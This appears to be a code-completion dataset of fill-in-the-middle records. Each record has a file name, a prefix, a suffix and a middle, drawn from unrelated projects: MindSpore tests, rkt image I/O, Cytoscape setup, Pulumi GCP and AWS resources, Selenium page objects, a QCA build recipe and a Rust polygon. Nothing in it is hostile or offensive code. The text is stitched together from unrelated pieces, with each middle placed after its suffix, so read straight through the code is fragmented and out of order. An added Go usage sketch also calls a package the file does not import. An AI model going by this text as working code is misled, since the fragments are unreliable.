super(CrossEntropyLoss2, self).__init__()
self.cross_entropy = SoftmaxCrossEntropyWithLogits(reduction=reduction)
def construct(self, logits, label):
loss = self.cross_entropy(logits, label)
return loss
def test_flatten_reshape4(parallel_mode="semi_auto_parallel"):
batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
set_algo_parameters(fully_use_devices=False)
net = ParallelReduceMeanNet(conv_in_channel=3, conv_out_channel=64, reducemean_keep_dims=True, strategy=((4, 1, 1, 1),))
loss = CrossEntropyLoss2()
predict = Tensor(np.ones([batch_size, 3, 32, 32]), dtype=ms.float32)
label = Tensor(np.ones([batch_size, 2048]), dtype=ms.float32)
dataset = Dataset(predict, label, 2, input_num=2)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
model = Model(net, loss_fn=loss, optimizer=opt)
model.train(epoch_size, dataset, dataset_sink_mode=False)
| batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
set_algo_parameters(fully_use_devices=False)
net = ParallelReshapeNet(dense_in_channel=2048, dense_out_channel=1000, shape=(128, 1000), strategy=((16, 1),))
loss = CrossEntropyLoss()
predict = Tensor(np.ones([batch_size, 1, 2, 1024]), dtype=ms.float32)
label = Tensor(np.ones([batch_size, 1000]), dtype=ms.float32)
dataset = Dataset(predict, label, 2, input_num=2)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
    model = Model(net, loss_fn=loss, optimizer=opt)
model.train(epoch_size, dataset, dataset_sink_mode=False) |
io.go | // Copyright 2015 The rkt Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package image
import (
"crypto/sha512"
"errors"
"fmt"
"io"
"net/http"
"os"
"time"
"github.com/hashicorp/errwrap"
"github.com/rkt/rkt/pkg/lock"
"github.com/rkt/rkt/store/imagestore"
"github.com/coreos/ioprogress"
)
// writeSyncer is an interface that wraps io.Writer and a Sync method.
type writeSyncer interface {
io.Writer
Sync() error
}
// readSeekCloser is an interface that wraps io.ReadSeeker and
// io.Closer
type readSeekCloser interface {
io.ReadSeeker
io.Closer
}
type nopReadSeekCloser struct {
io.ReadSeeker
}
func (nopReadSeekCloser) Close() error { return nil }
// NopReadSeekCloser wraps the given ReadSeeker
// and returns one that does nothing when Close() is being invoked.
func NopReadSeekCloser(rs io.ReadSeeker) readSeekCloser {
return nopReadSeekCloser{rs}
}
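// Hypothetical usage sketch (not part of the original source): wrap an in-memory
// ReadSeeker so callers that expect a readSeekCloser can call Close without side
// effects. Assumes the standard library "strings" package is imported.
func exampleNopReadSeekCloser() readSeekCloser {
	rs := strings.NewReader("image payload")
	return NopReadSeekCloser(rs) // Close on the result is a no-op
}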
// getIoProgressReader returns a reader that wraps the HTTP response
// body, so it prints a pretty progress bar when reading data from it.
func getIoProgressReader(label string, res *http.Response) io.Reader {
prefix := "Downloading " + label
fmtBytesSize := 18
barSize := int64(80 - len(prefix) - fmtBytesSize)
bar := ioprogress.DrawTextFormatBarForW(barSize, os.Stderr)
fmtfunc := func(progress, total int64) string {
// Content-Length is set to -1 when unknown.
if total == -1 {
return fmt.Sprintf(
"%s: %v of an unknown total size",
prefix,
ioprogress.ByteUnitStr(progress),
)
}
return fmt.Sprintf(
"%s: %s %s",
prefix,
bar(progress, total),
ioprogress.DrawTextFormatBytes(progress, total),
)
}
return &ioprogress.Reader{
Reader: res.Body,
Size: res.ContentLength,
DrawFunc: ioprogress.DrawTerminalf(os.Stderr, fmtfunc),
DrawInterval: time.Second,
}
}
// removeOnClose is a wrapper around os.File that removes the file
// when closing it. removeOnClose implements a readSeekCloser
// interface.
type removeOnClose struct { |
func (f *removeOnClose) Read(p []byte) (int, error) {
return f.File.Read(p)
}
func (f *removeOnClose) Seek(offset int64, whence int) (int64, error) {
return f.File.Seek(offset, whence)
}
// Close closes the file and then removes it from disk. No error is
// returned if the file did not exist at the point of removal.
func (f *removeOnClose) Close() error {
if f == nil || f.File == nil {
return nil
}
name := f.File.Name()
if err := f.File.Close(); err != nil {
return err
}
if err := os.Remove(name); err != nil && !os.IsNotExist(err) {
return err
}
return nil
}
// getTmpROC returns a removeOnClose instance wrapping a temporary
// file provided by the passed store. The actual file name is based on
// a hash of the passed path.
func getTmpROC(s *imagestore.Store, path string) (*removeOnClose, error) {
h := sha512.New()
h.Write([]byte(path))
pathHash := s.HashToKey(h)
tmp, err := s.TmpNamedFile(pathHash)
if err != nil {
return nil, errwrap.Wrap(errors.New("error setting up temporary file"), err)
}
// let's lock the file to avoid concurrent writes to the temporary file, it
// will go away when removing the temp file
_, err = lock.TryExclusiveLock(tmp.Name(), lock.RegFile)
if err != nil {
if err != lock.ErrLocked {
return nil, errwrap.Wrap(errors.New("failed to lock temporary file"), err)
}
log.Printf("another rkt instance is downloading this file, waiting...")
_, err = lock.ExclusiveLock(tmp.Name(), lock.RegFile)
if err != nil {
return nil, errwrap.Wrap(errors.New("failed to lock temporary file"), err)
}
}
return &removeOnClose{File: tmp}, nil
} | // File is a wrapped os.File
File *os.File
} |
inicialization.js | var cy = cytoscape({
container: document.getElementById('cy'),// container to render in
zoom: 1.6,
// wheelSensitivity: 0.2,
style: [ // the stylesheet for the graph
{
selector: 'node',
style: {
'background-color': 'rgba(207, 103, 221, 0.49)',
'color': 'floralwhite',
'label': 'data(id)',
'border-style': 'double',
'border-color': 'floralwhite',
'background-width': '60%',
'background-height': '70%',
                // Important for edit-mode checks
'background-image': 'none',
'border-width': '0px',
'font-size': '18px'
//
}
},
{
selector: 'edge',
style: {
'width': 3,
'line-color': 'rgba(193, 85, 255, 0.589)',
'target-arrow-color': 'rgba(190, 65, 221, 0.6)', | 'curve-style': 'bezier',
'label': 'data(label)',
'font-size': '16px',
'color': 'floralwhite'
}
}
],
layout: {
name: 'grid',
rows: 1
}
}); | 'target-arrow-shape': 'triangle', |
healthCheck.go | // *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package compute
import (
"reflect"
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Health Checks determine whether instances are responsive and able to do work.
// They are an important part of a comprehensive load balancing configuration,
// as they enable monitoring instances behind load balancers.
//
// Health Checks poll instances at a specified interval. Instances that
// do not respond successfully to some number of probes in a row are marked
// as unhealthy. No new connections are sent to unhealthy instances,
// though existing connections will continue. The health check will
// continue to poll unhealthy instances. If an instance later responds
// successfully to some number of consecutive probes, it is marked
// healthy again and can receive new connections.
//
// To get more information about HealthCheck, see:
//
// * [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/healthChecks)
// * How-to Guides
// * [Official Documentation](https://cloud.google.com/load-balancing/docs/health-checks)
//
// ## Example Usage
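//
// A minimal, hypothetical sketch (not taken from the upstream docs) of calling the
// NewHealthCheck constructor defined below. The pulumi-gcp module path/version and
// the HealthCheckTcpHealthCheckArgs helper are assumptions; the argument fields used
// match HealthCheckArgs later in this file.
//
// ```go
// package main
//
// import (
// 	"github.com/pulumi/pulumi-gcp/sdk/v4/go/gcp/compute"
// 	"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
// )
//
// func main() {
// 	pulumi.Run(func(ctx *pulumi.Context) error {
// 		_, err := compute.NewHealthCheck(ctx, "tcp-health-check", &compute.HealthCheckArgs{
// 			CheckIntervalSec: pulumi.Int(1),
// 			TimeoutSec:       pulumi.Int(1),
// 			TcpHealthCheck: &compute.HealthCheckTcpHealthCheckArgs{
// 				Port: pulumi.Int(80),
// 			},
// 		})
// 		return err
// 	})
// }
// ```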
type HealthCheck struct {
pulumi.CustomResourceState
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec pulumi.IntPtrOutput `pulumi:"checkIntervalSec"`
// Creation timestamp in RFC3339 text format.
CreationTimestamp pulumi.StringOutput `pulumi:"creationTimestamp"`
// An optional description of this resource. Provide this property when
// you create the resource.
Description pulumi.StringPtrOutput `pulumi:"description"`
// A nested object resource
// Structure is documented below.
GrpcHealthCheck HealthCheckGrpcHealthCheckPtrOutput `pulumi:"grpcHealthCheck"`
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold pulumi.IntPtrOutput `pulumi:"healthyThreshold"`
// A nested object resource
// Structure is documented below.
Http2HealthCheck HealthCheckHttp2HealthCheckPtrOutput `pulumi:"http2HealthCheck"`
// A nested object resource
// Structure is documented below.
HttpHealthCheck HealthCheckHttpHealthCheckPtrOutput `pulumi:"httpHealthCheck"`
// A nested object resource
// Structure is documented below.
HttpsHealthCheck HealthCheckHttpsHealthCheckPtrOutput `pulumi:"httpsHealthCheck"`
// Configure logging on this health check. Structure is documented below.
LogConfig HealthCheckLogConfigPtrOutput `pulumi:"logConfig"`
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
	// match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name pulumi.StringOutput `pulumi:"name"`
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project pulumi.StringOutput `pulumi:"project"`
// The URI of the created resource.
SelfLink pulumi.StringOutput `pulumi:"selfLink"`
// A nested object resource
// Structure is documented below.
SslHealthCheck HealthCheckSslHealthCheckPtrOutput `pulumi:"sslHealthCheck"`
// A nested object resource
// Structure is documented below.
TcpHealthCheck HealthCheckTcpHealthCheckPtrOutput `pulumi:"tcpHealthCheck"`
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec pulumi.IntPtrOutput `pulumi:"timeoutSec"`
// The type of the health check. One of HTTP, HTTPS, TCP, or SSL.
Type pulumi.StringOutput `pulumi:"type"`
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold pulumi.IntPtrOutput `pulumi:"unhealthyThreshold"`
}
// NewHealthCheck registers a new resource with the given unique name, arguments, and options.
func NewHealthCheck(ctx *pulumi.Context,
name string, args *HealthCheckArgs, opts ...pulumi.ResourceOption) (*HealthCheck, error) {
if args == nil {
args = &HealthCheckArgs{}
}
var resource HealthCheck
err := ctx.RegisterResource("gcp:compute/healthCheck:HealthCheck", name, args, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
}
// GetHealthCheck gets an existing HealthCheck resource's state with the given name, ID, and optional
// state properties that are used to uniquely qualify the lookup (nil if not required).
func GetHealthCheck(ctx *pulumi.Context,
name string, id pulumi.IDInput, state *HealthCheckState, opts ...pulumi.ResourceOption) (*HealthCheck, error) |
// Input properties used for looking up and filtering HealthCheck resources.
type healthCheckState struct {
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec *int `pulumi:"checkIntervalSec"`
// Creation timestamp in RFC3339 text format.
CreationTimestamp *string `pulumi:"creationTimestamp"`
// An optional description of this resource. Provide this property when
// you create the resource.
Description *string `pulumi:"description"`
// A nested object resource
// Structure is documented below.
GrpcHealthCheck *HealthCheckGrpcHealthCheck `pulumi:"grpcHealthCheck"`
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold *int `pulumi:"healthyThreshold"`
// A nested object resource
// Structure is documented below.
Http2HealthCheck *HealthCheckHttp2HealthCheck `pulumi:"http2HealthCheck"`
// A nested object resource
// Structure is documented below.
HttpHealthCheck *HealthCheckHttpHealthCheck `pulumi:"httpHealthCheck"`
// A nested object resource
// Structure is documented below.
HttpsHealthCheck *HealthCheckHttpsHealthCheck `pulumi:"httpsHealthCheck"`
// Configure logging on this health check. Structure is documented below.
LogConfig *HealthCheckLogConfig `pulumi:"logConfig"`
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
	// match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name *string `pulumi:"name"`
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project *string `pulumi:"project"`
// The URI of the created resource.
SelfLink *string `pulumi:"selfLink"`
// A nested object resource
// Structure is documented below.
SslHealthCheck *HealthCheckSslHealthCheck `pulumi:"sslHealthCheck"`
// A nested object resource
// Structure is documented below.
TcpHealthCheck *HealthCheckTcpHealthCheck `pulumi:"tcpHealthCheck"`
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec *int `pulumi:"timeoutSec"`
// The type of the health check. One of HTTP, HTTPS, TCP, or SSL.
Type *string `pulumi:"type"`
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold *int `pulumi:"unhealthyThreshold"`
}
type HealthCheckState struct {
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec pulumi.IntPtrInput
// Creation timestamp in RFC3339 text format.
CreationTimestamp pulumi.StringPtrInput
// An optional description of this resource. Provide this property when
// you create the resource.
Description pulumi.StringPtrInput
// A nested object resource
// Structure is documented below.
GrpcHealthCheck HealthCheckGrpcHealthCheckPtrInput
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold pulumi.IntPtrInput
// A nested object resource
// Structure is documented below.
Http2HealthCheck HealthCheckHttp2HealthCheckPtrInput
// A nested object resource
// Structure is documented below.
HttpHealthCheck HealthCheckHttpHealthCheckPtrInput
// A nested object resource
// Structure is documented below.
HttpsHealthCheck HealthCheckHttpsHealthCheckPtrInput
// Configure logging on this health check. Structure is documented below.
LogConfig HealthCheckLogConfigPtrInput
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
	// match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name pulumi.StringPtrInput
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project pulumi.StringPtrInput
// The URI of the created resource.
SelfLink pulumi.StringPtrInput
// A nested object resource
// Structure is documented below.
SslHealthCheck HealthCheckSslHealthCheckPtrInput
// A nested object resource
// Structure is documented below.
TcpHealthCheck HealthCheckTcpHealthCheckPtrInput
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec pulumi.IntPtrInput
// The type of the health check. One of HTTP, HTTPS, TCP, or SSL.
Type pulumi.StringPtrInput
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold pulumi.IntPtrInput
}
func (HealthCheckState) ElementType() reflect.Type {
return reflect.TypeOf((*healthCheckState)(nil)).Elem()
}
type healthCheckArgs struct {
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec *int `pulumi:"checkIntervalSec"`
// An optional description of this resource. Provide this property when
// you create the resource.
Description *string `pulumi:"description"`
// A nested object resource
// Structure is documented below.
GrpcHealthCheck *HealthCheckGrpcHealthCheck `pulumi:"grpcHealthCheck"`
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold *int `pulumi:"healthyThreshold"`
// A nested object resource
// Structure is documented below.
Http2HealthCheck *HealthCheckHttp2HealthCheck `pulumi:"http2HealthCheck"`
// A nested object resource
// Structure is documented below.
HttpHealthCheck *HealthCheckHttpHealthCheck `pulumi:"httpHealthCheck"`
// A nested object resource
// Structure is documented below.
HttpsHealthCheck *HealthCheckHttpsHealthCheck `pulumi:"httpsHealthCheck"`
// Configure logging on this health check. Structure is documented below.
LogConfig *HealthCheckLogConfig `pulumi:"logConfig"`
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
	// match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name *string `pulumi:"name"`
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project *string `pulumi:"project"`
// A nested object resource
// Structure is documented below.
SslHealthCheck *HealthCheckSslHealthCheck `pulumi:"sslHealthCheck"`
// A nested object resource
// Structure is documented below.
TcpHealthCheck *HealthCheckTcpHealthCheck `pulumi:"tcpHealthCheck"`
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec *int `pulumi:"timeoutSec"`
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold *int `pulumi:"unhealthyThreshold"`
}
// The set of arguments for constructing a HealthCheck resource.
type HealthCheckArgs struct {
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec pulumi.IntPtrInput
// An optional description of this resource. Provide this property when
// you create the resource.
Description pulumi.StringPtrInput
// A nested object resource
// Structure is documented below.
GrpcHealthCheck HealthCheckGrpcHealthCheckPtrInput
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold pulumi.IntPtrInput
// A nested object resource
// Structure is documented below.
Http2HealthCheck HealthCheckHttp2HealthCheckPtrInput
// A nested object resource
// Structure is documented below.
HttpHealthCheck HealthCheckHttpHealthCheckPtrInput
// A nested object resource
// Structure is documented below.
HttpsHealthCheck HealthCheckHttpsHealthCheckPtrInput
// Configure logging on this health check. Structure is documented below.
LogConfig HealthCheckLogConfigPtrInput
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
	// match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name pulumi.StringPtrInput
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project pulumi.StringPtrInput
// A nested object resource
// Structure is documented below.
SslHealthCheck HealthCheckSslHealthCheckPtrInput
// A nested object resource
// Structure is documented below.
TcpHealthCheck HealthCheckTcpHealthCheckPtrInput
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec pulumi.IntPtrInput
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold pulumi.IntPtrInput
}
func (HealthCheckArgs) ElementType() reflect.Type {
return reflect.TypeOf((*healthCheckArgs)(nil)).Elem()
}
| {
var resource HealthCheck
err := ctx.ReadResource("gcp:compute/healthCheck:HealthCheck", name, id, state, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
} |
users.types.ts | import { Document, Model } from 'mongoose'
import { UserEntity } from '@domain/qrCode/entities/user'
export interface IUserDocument extends UserEntity, Document {}
export interface IUserModel extends Model<IUserDocument> { | findByEmail: (this: IUserModel, email: string) => Promise<IUserDocument>
} |
|
base_page.py | import math
import time
from .locators import BasePageLocators
from selenium.common.exceptions import NoSuchElementException, NoAlertPresentException, TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class BasePage():
def __init__(self, browser, url, timeout=10):
self.browser = browser
self.url = url
self.browser.implicitly_wait(timeout)
def go_to_basket_page(self):
link = self.browser.find_element(*BasePageLocators.BASKET_BUTTON)
link.click()
def go_to_login_page(self):
link = self.browser.find_element(*BasePageLocators.LOGIN_LINK)
link.click()
def is_disappeared(self, how, what, timeout=4):
try:
WebDriverWait(self.browser, timeout, 1, TimeoutException).\
until_not(EC.presence_of_element_located((how, what)))
except TimeoutException:
return False
return True
def is_element_present(self, how, what):
|
def is_not_element_present(self, how, what, timeout=4):
try:
WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))
except TimeoutException:
return True
return False
def open(self):
self.browser.get(self.url)
def should_be_authorized_user(self):
assert self.is_element_present(*BasePageLocators.USER_ICON), "User icon is not presented," \
" probably unauthorised user"
def should_be_basket_button(self):
assert self.is_element_present(*BasePageLocators.BASKET_BUTTON)
def should_be_login_link(self):
assert self.is_element_present(*BasePageLocators.LOGIN_LINK), "Login link is not presented"
def solve_quiz_and_get_code(self):
alert = self.browser.switch_to.alert
x = alert.text.split(" ")[2]
answer = str(math.log(abs((12 * math.sin(float(x))))))
alert.send_keys(answer)
alert.accept()
try:
alert = self.browser.switch_to.alert
alert_text = alert.text
print(f"Your code: {alert_text}")
alert.accept()
except NoAlertPresentException:
print("No second alert presented")
| try:
self.browser.find_element(how, what)
except NoSuchElementException:
return False
return True |
qca.py | import info
class subinfo(info.infoclass):
def setDependencies(self):
self.runtimeDependencies["virtual/base"] = None
self.runtimeDependencies["libs/qt5/qtbase"] = None
self.runtimeDependencies["libs/openssl"] = None
self.runtimeDependencies["libs/cyrus-sasl"] = None
def setTargets(self):
self.description = "Qt Cryptographic Architecture (QCA)"
self.svnTargets["master"] = "https://anongit.kde.org/qca.git"
# latest stable version
self.defaultTarget = "2.3.3"
self.targets[self.defaultTarget] = f"https://download.kde.org/stable/qca/{self.defaultTarget}/qca-{self.defaultTarget}.tar.xz"
self.targetDigestUrls[self.defaultTarget] = f"https://download.kde.org/stable/qca/{self.defaultTarget}/qca-{self.defaultTarget}.tar.xz.sha256"
self.targetInstSrc[self.defaultTarget] = f"qca-{self.defaultTarget}"
self.patchToApply[self.defaultTarget] = [("msvc.diff", 1)]
self.patchLevel[self.defaultTarget] = 1
from Package.CMakePackageBase import *
class | (CMakePackageBase):
def __init__(self, **args):
CMakePackageBase.__init__(self)
# the cmake config is not relocatable
self.subinfo.options.package.disableBinaryCache = True
# tests fail to build with missing openssl header
self.subinfo.options.configure.args = "-DBUILD_TESTS=OFF "
| Package |
asia.rs | extern crate geo;
pub fn get_polygon() -> geo::Polygon<f32> | {
let exterior = geo::LineString::from(vec![
(-168.250000, 77.700000),
(-180.000000, 77.700000),
(-180.000000, 58.100000),
(-168.250000, 58.100000),
(-168.250000, 77.700000),
]);
let interior = vec![geo::LineString::from(vec![
(39.690800, 84.526660),
(180.000000, 84.384870),
(180.000000, 26.278830),
(142.084541, 22.062707),
(130.147000, 3.608598),
(141.137300, -1.666358),
(141.043800, -9.784795),
(130.264500, -10.039900),
(118.254500, -13.011650),
(102.797500, -8.388008),
(89.504510, -11.141700),
(61.625110, -9.103512),
(51.626450, 12.548650),
(44.207750, 11.678600),
(39.780160, 16.568550),
(31.604010, 31.586410),
(33.277690, 34.000570),
(34.767400, 34.853470),
(35.724230, 36.326860),
(36.559700, 37.664390),
(44.105300, 37.984380),
(43.016380, 41.271910),
(41.283040, 41.412740),
(36.263780, 44.407720),
(36.613150, 45.587230),
(37.484930, 46.809240),
(38.274970, 47.613170),
(39.561640, 48.431410),
(39.772640, 50.588910),
(39.690800, 84.526660),
])];
geo::Polygon::new(exterior, interior)
} |
|
resourceShareAccepter.go | // *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package ram
import (
"reflect"
"github.com/pkg/errors"
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Manage accepting a Resource Access Manager (RAM) Resource Share invitation. From a _receiver_ AWS account, accept an invitation to share resources that were shared by a _sender_ AWS account. To create a resource share in the _sender_, see the `ram.ResourceShare` resource.
//
// > **Note:** If both AWS accounts are in the same Organization and [RAM Sharing with AWS Organizations is enabled](https://docs.aws.amazon.com/ram/latest/userguide/getting-started-sharing.html#getting-started-sharing-orgs), this resource is not necessary as RAM Resource Share invitations are not used.
//
// ## Example Usage
//
// This configuration provides an example of using multiple AWS providers to configure two different AWS accounts. In the _sender_ account, the configuration creates a `ram.ResourceShare` and uses a data source in the _receiver_ account to create a `ram.PrincipalAssociation` resource with the _receiver's_ account ID. In the _receiver_ account, the configuration accepts the invitation to share resources with the `ram.ResourceShareAccepter`.
//
// ```go
// package main
//
// import (
// "github.com/pulumi/pulumi-aws/sdk/v3/go/aws"
// "github.com/pulumi/pulumi-aws/sdk/v3/go/aws/providers"
// "github.com/pulumi/pulumi-aws/sdk/v3/go/aws/ram"
// "github.com/pulumi/pulumi/sdk/v2/go/pulumi"
// )
//
// func main() {
// pulumi.Run(func(ctx *pulumi.Context) error {
// _, err := providers.Newaws(ctx, "alternate", &providers.awsArgs{
// Profile: pulumi.String("profile1"),
// })
// if err != nil {
// return err
// }
// senderShare, err := ram.NewResourceShare(ctx, "senderShare", &ram.ResourceShareArgs{
// AllowExternalPrincipals: pulumi.Bool(true),
// Tags: pulumi.StringMap{
// "Name": pulumi.String("tf-test-resource-share"),
// },
// }, pulumi.Provider(aws.Alternate))
// if err != nil {
// return err
// }
// receiver, err := aws.GetCallerIdentity(ctx, nil, nil)
// if err != nil {
// return err
// }
// senderInvite, err := ram.NewPrincipalAssociation(ctx, "senderInvite", &ram.PrincipalAssociationArgs{
// Principal: pulumi.String(receiver.AccountId),
// ResourceShareArn: senderShare.Arn,
// }, pulumi.Provider(aws.Alternate))
// if err != nil {
// return err
// }
// _, err = ram.NewResourceShareAccepter(ctx, "receiverAccept", &ram.ResourceShareAccepterArgs{
// ShareArn: senderInvite.ResourceShareArn,
// })
// if err != nil {
// return err
// }
// return nil
// })
// }
// ```
type ResourceShareAccepter struct {
pulumi.CustomResourceState
// The ARN of the resource share invitation.
InvitationArn pulumi.StringOutput `pulumi:"invitationArn"`
// The account ID of the receiver account which accepts the invitation.
ReceiverAccountId pulumi.StringOutput `pulumi:"receiverAccountId"`
// A list of the resource ARNs shared via the resource share.
Resources pulumi.StringArrayOutput `pulumi:"resources"`
// The account ID of the sender account which submits the invitation.
SenderAccountId pulumi.StringOutput `pulumi:"senderAccountId"`
// The ARN of the resource share.
ShareArn pulumi.StringOutput `pulumi:"shareArn"`
// The ID of the resource share as displayed in the console.
ShareId pulumi.StringOutput `pulumi:"shareId"`
// The name of the resource share.
ShareName pulumi.StringOutput `pulumi:"shareName"`
// The status of the resource share (ACTIVE, PENDING, FAILED, DELETING, DELETED).
Status pulumi.StringOutput `pulumi:"status"`
}
// NewResourceShareAccepter registers a new resource with the given unique name, arguments, and options.
func NewResourceShareAccepter(ctx *pulumi.Context,
name string, args *ResourceShareAccepterArgs, opts ...pulumi.ResourceOption) (*ResourceShareAccepter, error) {
if args == nil || args.ShareArn == nil {
return nil, errors.New("missing required argument 'ShareArn'")
}
if args == nil {
args = &ResourceShareAccepterArgs{}
}
var resource ResourceShareAccepter
err := ctx.RegisterResource("aws:ram/resourceShareAccepter:ResourceShareAccepter", name, args, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
}
// GetResourceShareAccepter gets an existing ResourceShareAccepter resource's state with the given name, ID, and optional
// state properties that are used to uniquely qualify the lookup (nil if not required).
func | (ctx *pulumi.Context,
name string, id pulumi.IDInput, state *ResourceShareAccepterState, opts ...pulumi.ResourceOption) (*ResourceShareAccepter, error) {
var resource ResourceShareAccepter
err := ctx.ReadResource("aws:ram/resourceShareAccepter:ResourceShareAccepter", name, id, state, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
}
// Input properties used for looking up and filtering ResourceShareAccepter resources.
type resourceShareAccepterState struct {
// The ARN of the resource share invitation.
InvitationArn *string `pulumi:"invitationArn"`
// The account ID of the receiver account which accepts the invitation.
ReceiverAccountId *string `pulumi:"receiverAccountId"`
// A list of the resource ARNs shared via the resource share.
Resources []string `pulumi:"resources"`
// The account ID of the sender account which submits the invitation.
SenderAccountId *string `pulumi:"senderAccountId"`
// The ARN of the resource share.
ShareArn *string `pulumi:"shareArn"`
// The ID of the resource share as displayed in the console.
ShareId *string `pulumi:"shareId"`
// The name of the resource share.
ShareName *string `pulumi:"shareName"`
// The status of the resource share (ACTIVE, PENDING, FAILED, DELETING, DELETED).
Status *string `pulumi:"status"`
}
type ResourceShareAccepterState struct {
// The ARN of the resource share invitation.
InvitationArn pulumi.StringPtrInput
// The account ID of the receiver account which accepts the invitation.
ReceiverAccountId pulumi.StringPtrInput
// A list of the resource ARNs shared via the resource share.
Resources pulumi.StringArrayInput
// The account ID of the sender account which submits the invitation.
SenderAccountId pulumi.StringPtrInput
// The ARN of the resource share.
ShareArn pulumi.StringPtrInput
// The ID of the resource share as displayed in the console.
ShareId pulumi.StringPtrInput
// The name of the resource share.
ShareName pulumi.StringPtrInput
// The status of the resource share (ACTIVE, PENDING, FAILED, DELETING, DELETED).
Status pulumi.StringPtrInput
}
func (ResourceShareAccepterState) ElementType() reflect.Type {
return reflect.TypeOf((*resourceShareAccepterState)(nil)).Elem()
}
type resourceShareAccepterArgs struct {
// The ARN of the resource share.
ShareArn string `pulumi:"shareArn"`
}
// The set of arguments for constructing a ResourceShareAccepter resource.
type ResourceShareAccepterArgs struct {
// The ARN of the resource share.
ShareArn pulumi.StringInput
}
func (ResourceShareAccepterArgs) ElementType() reflect.Type {
return reflect.TypeOf((*resourceShareAccepterArgs)(nil)).Elem()
}
| GetResourceShareAccepter |
